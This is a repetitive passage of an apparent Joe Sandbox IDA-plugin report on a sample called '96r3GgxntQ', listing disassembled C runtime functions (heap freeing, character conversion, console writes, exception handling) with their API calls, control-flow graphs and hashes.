• Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                                                                                                          • Opcode ID: b8b22b6f54397ba0cb63b487288860c5903d8f51f030062b85de8e6997d75617
                                                                                                                                                                                                                                                          • Instruction ID: cda04cbca70122b87f2ced90312ff9c4a541b28ddbb632b1066d8f49ae8b1754
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8b22b6f54397ba0cb63b487288860c5903d8f51f030062b85de8e6997d75617
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA31E272900249AFCB249E78CC84EFA7BFDEB85314F0441E9F55997252EBB09D458B50
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BBA490,?,?,00000008,?,?,00BBA130,00000000), ref: 00BBA6C2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                          • Opcode ID: 861b9d6285df59f70278e796c05fc17c23cb215c6af9efb691424f5abd4185bb
                                                                                                                                                                                                                                                          • Instruction ID: f3b7571102dd04d54a392a8db3f725658bf01a9815085dde1e596141ec608fd8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 861b9d6285df59f70278e796c05fc17c23cb215c6af9efb691424f5abd4185bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BB15F71A10608DFD715CF28C48ABA47BE0FF45364F298698E89ACF2A1C775DD92CB41
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BB1BEA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                          • Opcode ID: 3d5304941ab78fb2b7d9da8c043a010544d8c27c753aa5ade560323097d0073a
                                                                                                                                                                                                                                                          • Instruction ID: 2e979d8252981a6c8b51e2df4a1f5cdd0c68bf47c2495a771fb6899811448cad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d5304941ab78fb2b7d9da8c043a010544d8c27c753aa5ade560323097d0073a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C517CB1A112058BDB15CF6CD891BAEBBF0FB88340F24886AC405EB261D7B4ED41CF50
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00BB1300), ref: 00BB1AB1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                          • Opcode ID: a6ebf003e3c42eac2e72ccb7b45d290cfefef3b158eb4dac801a62ebcf95cdb8
                                                                                                                                                                                                                                                          • Instruction ID: 558c06a998dbff8bb03be8e80788235824f1b2f276a3798b343c3ec3b0b3fb1d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6ebf003e3c42eac2e72ccb7b45d290cfefef3b158eb4dac801a62ebcf95cdb8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                          • Opcode ID: 89666d2c8aacc2875f189268965bda6667f5c7c240b455c56ef4aa528aab4c83
                                                                                                                                                                                                                                                          • Instruction ID: c1b27db077faf9d7cf66289a5e71f517ca291eba9cc59572652669abed8a2e8a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89666d2c8aacc2875f189268965bda6667f5c7c240b455c56ef4aa528aab4c83
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76A02430300101CF4300CF34DF4570C35DC57045C070700145004F3030DF7040405F11

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 00BB654B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6095
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB60A7
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB60B9
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB60CB
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB60DD
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB60EF
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6101
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6113
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6125
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6137
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6149
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB615B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB616D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6540
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: HeapFree.KERNEL32(00000000,00000000,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?), ref: 00BB487F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: GetLastError.KERNEL32(?,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?,?), ref: 00BB4891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6562
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6577
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6582
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB65A4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB65B7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB65C5
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB65D0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6608
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB660F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB662C
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6644
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 161543041-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 138 bb4330-bb4341 139 bb434d-bb43d8 call bb4869 * 9 call bb41f6 call bb4246 138->139 140 bb4343-bb434c call bb4869 138->140 140->139
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4344
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: HeapFree.KERNEL32(00000000,00000000,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?), ref: 00BB487F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: GetLastError.KERNEL32(?,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?,?), ref: 00BB4891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4350
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB435B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4366
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4371
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB437C
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4387
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4392
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB439D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB43AB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 165 bb7ab4-bb7acd 166 bb7acf-bb7adf call bb82cc 165->166 167 bb7ae3-bb7ae8 165->167 166->167 174 bb7ae1 166->174 169 bb7aea-bb7af2 167->169 170 bb7af5-bb7b19 MultiByteToWideChar 167->170 169->170 172 bb7b1f-bb7b2b 170->172 173 bb7cac-bb7cbf call bb123a 170->173 175 bb7b7f 172->175 176 bb7b2d-bb7b3e 172->176 174->167 178 bb7b81-bb7b83 175->178 179 bb7b5d-bb7b63 176->179 180 bb7b40-bb7b4f call bbac20 176->180 182 bb7b89-bb7b9c MultiByteToWideChar 178->182 183 bb7ca1 178->183 185 bb7b64 call bb62ff 179->185 180->183 193 bb7b55-bb7b5b 180->193 182->183 187 bb7ba2-bb7bbd call bb5a15 182->187 188 bb7ca3-bb7caa call bb646a 183->188 186 bb7b69-bb7b6e 185->186 186->183 190 bb7b74 186->190 187->183 197 bb7bc3-bb7bca 187->197 188->173 194 bb7b7a-bb7b7d 190->194 193->194 194->178 198 bb7bcc-bb7bd1 197->198 199 bb7c04-bb7c10 197->199 198->188 202 bb7bd7-bb7bd9 198->202 200 bb7c5c 199->200 201 bb7c12-bb7c23 199->201 205 bb7c5e-bb7c60 200->205 203 bb7c3e-bb7c44 201->203 204 bb7c25-bb7c34 call bbac20 201->204 202->183 206 bb7bdf-bb7bf9 call bb5a15 202->206 208 bb7c45 call bb62ff 203->208 209 bb7c9a-bb7ca0 call bb646a 204->209 217 bb7c36-bb7c3c 204->217 205->209 210 bb7c62-bb7c7b call bb5a15 205->210 206->188 221 bb7bff 206->221 214 bb7c4a-bb7c4f 208->214 209->183 210->209 222 bb7c7d-bb7c84 210->222 214->209 219 bb7c51 214->219 223 bb7c57-bb7c5a 217->223 219->223 221->183 224 bb7cc0-bb7cc6 222->224 225 bb7c86-bb7c87 222->225 223->205 226 bb7c88-bb7c98 WideCharToMultiByte 224->226 225->226 226->209 227 bb7cc8-bb7ccf call bb646a 226->227 227->188
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00BB54C8,00000000,?,?,?,00BB7D05,?,?,00000100), ref: 00BB7B0E
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00BB7B46
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00BB7D05,?,?,00000100,5EFC4D8B,?,?), ref: 00BB7B94
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00BB7C2B
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BB7C8E
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00BB7C9B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00BB7E5B,?,00000000,?,00BB686F,?,00000004,00000000,?,?,?,00BB3BCD), ref: 00BB6331
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00BB7CA4
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00BB7CC9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2597970681-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 230 bb8417-bb8474 GetConsoleCP 231 bb847a-bb8496 230->231 232 bb85b7-bb85c9 call bb123a 230->232 233 bb8498-bb84af 231->233 234 bb84b1-bb84c2 call bb6052 231->234 236 bb84eb-bb84fa call bb72b7 233->236 242 bb84e8-bb84ea 234->242 243 bb84c4-bb84c7 234->243 236->232 244 bb8500-bb8520 WideCharToMultiByte 236->244 242->236 245 bb858e-bb85ad 243->245 246 bb84cd-bb84df call bb72b7 243->246 244->232 247 bb8526-bb853c WriteFile 244->247 245->232 246->232 253 bb84e5-bb84e6 246->253 249 bb85af-bb85b5 GetLastError 247->249 250 bb853e-bb854f 247->250 249->232 250->232 252 bb8551-bb8555 250->252 254 bb8583-bb8586 252->254 255 bb8557-bb8575 WriteFile 252->255 253->244 254->231 257 bb858c 254->257 255->249 256 bb8577-bb857b 255->256 256->232 258 bb857d-bb8580 256->258 257->232 258->254
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00BB8B8C,?,00000000,?,00000000,00000000), ref: 00BB8459
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00BB84D4
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00BB84EF
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00BB8515
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,00BB8B8C,00000000,?,?,?,?,?,?,?,?,?,00BB8B8C,?), ref: 00BB8534
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00BB8B8C,00000000,?,?,?,?,?,?,?,?,?,00BB8B8C,?), ref: 00BB856D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                          • Opcode ID: cb9e7848c41236f7bdb719c3f75b0e3678ac46d980e871c2d4e92bd75ce45d78
                                                                                                                                                                                                                                                          • Instruction ID: ae78bb4b6db284429be556f2d386cbc0444fe224db0f6161ab119160fb766ea9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb9e7848c41236f7bdb719c3f75b0e3678ac46d980e871c2d4e92bd75ce45d78
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57517371E002499FDB20CFA8DC85AFEBBF9EF19300F14455AE955E7291DBB09941CBA0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 259 bb1e00-bb1e51 call bbac80 call bb1dc0 call bb2377 266 bb1ead-bb1eb0 259->266 267 bb1e53-bb1e65 259->267 268 bb1eb2-bb1ebf call bb2360 266->268 269 bb1ed0-bb1ed9 266->269 267->269 270 bb1e67-bb1e7e 267->270 275 bb1ec4-bb1ecd call bb1dc0 268->275 272 bb1e80-bb1e8e call bb2300 270->272 273 bb1e94 270->273 282 bb1e90 272->282 283 bb1ea4-bb1eab 272->283 274 bb1e97-bb1e9c 273->274 274->270 277 bb1e9e-bb1ea0 274->277 275->269 277->269 280 bb1ea2 277->280 280->275 284 bb1eda-bb1ee3 282->284 285 bb1e92 282->285 283->275 286 bb1f1d-bb1f2d call bb2340 284->286 287 bb1ee5-bb1eec 284->287 285->274 293 bb1f2f-bb1f3e call bb2360 286->293 294 bb1f41-bb1f5d call bb1dc0 call bb2320 286->294 287->286 289 bb1eee-bb1efd call bbaac0 287->289 295 bb1f1a 289->295 296 bb1eff-bb1f17 289->296 293->294 295->286 296->295
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00BB1E37
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00BB1E3F
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00BB1EC8
                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00BB1EF3
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00BB1F48
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                          • Opcode ID: 1ee18148f0f0d4b0bed1eb2cf63ff9c9facc4ab700ee7ae16938210231ea07d7
                                                                                                                                                                                                                                                          • Instruction ID: 4234bb1dd2a05139890d0fe306c2df91441eb825a81e136407a47a72911addc6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ee18148f0f0d4b0bed1eb2cf63ff9c9facc4ab700ee7ae16938210231ea07d7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC41B034A00208ABCF10DF6CC891AFEBBF5EF45354F5488D5E818AB292D7B1E901CB90

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 305 bb621b-bb6226 306 bb62fc-bb62fe 305->306 307 bb622c-bb62f9 call bb61df * 5 call bb4869 * 3 call bb61df * 5 call bb4869 * 4 305->307 307->306
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00BB61DF: _free.LIBCMT ref: 00BB6208
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6269
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: HeapFree.KERNEL32(00000000,00000000,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?), ref: 00BB487F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: GetLastError.KERNEL32(?,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?,?), ref: 00BB4891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6274
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB627F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB62D3
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB62DE
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB62E9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB62F4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                          • Instruction ID: 32107758355707f15aee5b90a82a4c4d66876e440ed445db0a3a6ed97f402477
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD114C71540B14ABD620BBB5CC07FEB77ECAF40700F404865B69EB6093EBB9BE048690

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 342 bb3d8f-bb3d9c 343 bb3db9-bb3e05 call bb4869 * 4 342->343 344 bb3d9e-bb3daa 342->344 344->343 345 bb3dac-bb3db3 call bb4869 344->345 345->343
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3DAD
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: HeapFree.KERNEL32(00000000,00000000,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?), ref: 00BB487F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: GetLastError.KERNEL32(?,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?,?), ref: 00BB4891
